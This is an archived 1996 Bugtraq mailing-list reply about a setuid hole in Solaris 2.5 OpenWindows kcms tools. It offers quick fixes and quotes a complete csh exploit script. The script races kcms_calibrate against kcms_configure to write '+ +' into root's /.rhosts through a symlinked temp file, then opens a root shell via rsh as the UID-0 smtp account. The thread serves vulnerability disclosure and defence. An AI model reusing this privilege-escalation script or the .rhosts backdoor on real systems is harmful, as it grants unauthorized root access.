Bugtraq mailing list archives
Re: Zolaris 2.5 Exploited.
From: beren () cosmos kaist ac kr (Jungseok Roh)
Date: Fri, 26 Jul 1996 08:48:17 -0900
I tried this posted exploit as well, and it does work (quite well, in fact). I have looked at this a little closer, and it appears that you can protect yourself from this hole by doing one of the following (these are just the quick patches, not involving changing the UID of root, installing a safer rshd, etc) 1) root# chmod gu-s /usr/openwin/bin/kcms_c* or 2) root# touch /.rhosts root# chown root:root /.rhosts root# chmod 600 /.rhosts
ln -s /dev/null /.rhosts is recommended. " Divided Alive , Interconnected Dead. " that's the proverb in internet Security. :)
I am not going to say that this plugs the hole completely; I havn't had the time (and probably won't) or the experience to dig deeper into this. I will leave the deeper evaluation and patch to the experts. Brian P.S. If the followup to BUGTRAQ is inappropriate, my apologies. Brian T. Wightman Academic Computing, UW Oshkosh wightman () uwosh edu 800 Algoma Blvd Phone: (414) 424-3020 Dempsey Hall 307 http://www.uwosh.edu/faculty_staff/wightman/ Oshkosh, Wisconsin 54901 In message <199607261337.EAA05783 () cosmos kaist ac kr>, Jungseok Roh wrote:Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago ~ then ONe of my senior told me that there might be a Funny ,also UNCONCEIVABLE bugs in Openwindows.. I trusted him... and I traversed the file system under /usr/openwin .. there were just four SUIDed files .. ( if Admin installed openwin packages ) xlock , ff.core , kcms* .. Problem made less vague kcms_calibrate , kcms_configure is the objects we are approaching. When examining the kcms families. I found a funny stuff . kcms_configure makes the temporary(?) files in /tmp whoses permisson bit is 666 ( Wow The sign of Devil ),, definately root owns it.. IT'S NAME is Kp_kcms_sys.sem !... Then all u guys know the next procedure is . hk.. I can't show u whole the procedure right now. 'Cause My Zolaris machine is "Network Unreachible ...". One Odd thin's are Exploitation Succeeds when it interacts with kcms_calibrat e!! Major procedure is making the temporary files which linked to /.rhosts then while kcms_configure tries to write /.rhosts make Thunder rolls using kcms_calibrate and Make its power Powerful.. puha.. it's like seeing Back To the Future III... then kcms_configure succeed its operation . I made a simple script exploiting the machine who has that fatal bug. hmm..but I can't erase one curiosity .. Why Sun made this humble mistake ? ... plz someboy notify this bug to SUN. I don't know Her E-mail Address .. :) (what a simple!!) script follows . this script shows u just PROCEDURE .. re-make on your demands . cat > uhit.sh << E_O_F #!/bin/csh # JungSeok. Roh ( beren () cosmos kaist ac kr ) # Junior in KAIST undergraduate. Under Management Dep . set disp="cosmos.kaist.ac.kr:0.0" setenv DISPLAY $disp /bin/rm -rf /tmp/Kp_kcms_sys.sem cd /tmp #Making symbolic link ln -s /.rhosts Kp_kcms_sys.sem /usr/openwin/bin/kcms_calibrate & while(1) echo "Click the device you've chosen in kcms_calibrate window" # Choose Any profiles .. hk.. # My 2.5 machine is unreachible son I can't get exact name of that profiles. # What a fool I am.. jjap.. /usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/pr ofiles/Eksony17.mon if( -f /.rhosts ) then echo -n "+ +" >> /.rhosts # As u know , we can't login as root .. use smtp account. that has UID 0 !! /usr/bin/rsh localhost -l smtp csh -i endif end E_O_F __ There was a Legendary Security Task Force team whose Name is K/U/S .. But BLOWED up by KOREAN National Prosecutor.. I hate them !! ....... They make me so sad .... Laughin' in bitter tears ... hk..hk.. JungSeok Roh / Junior in KAIST / beren () cosmos kaist ac kr / +82-42-869-5400
Current thread:
- Re: Zolaris 2.5 Exploited. Leif Hedstrom (Jul 25)
- admintool (was Re: Zolaris 2.5 Exploited.) anthony baxter (Jul 25)
- <Possible follow-ups>
- Zolaris 2.5 Exploited. Jungseok Roh (Jul 26)
- Re: Zolaris 2.5 Exploited. Brian T. Wightman (Jul 25)
- Re: Zolaris 2.5 Exploited. Jungseok Roh (Jul 26)
- Re: Zolaris 2.5 Exploited. Brian T. Wightman (Jul 25)
- Re: Zolaris 2.5 Exploited. Eugene Bradley (Jul 26)
- Re: Zolaris 2.5 Exploited. Matthew G. Harrigan (Jul 26)
- Re: Zolaris 2.5 Exploited. Steph Bridges (Jul 26)
- Re: Zolaris 2.5 Exploited. Jeff Wolfe (Jul 26)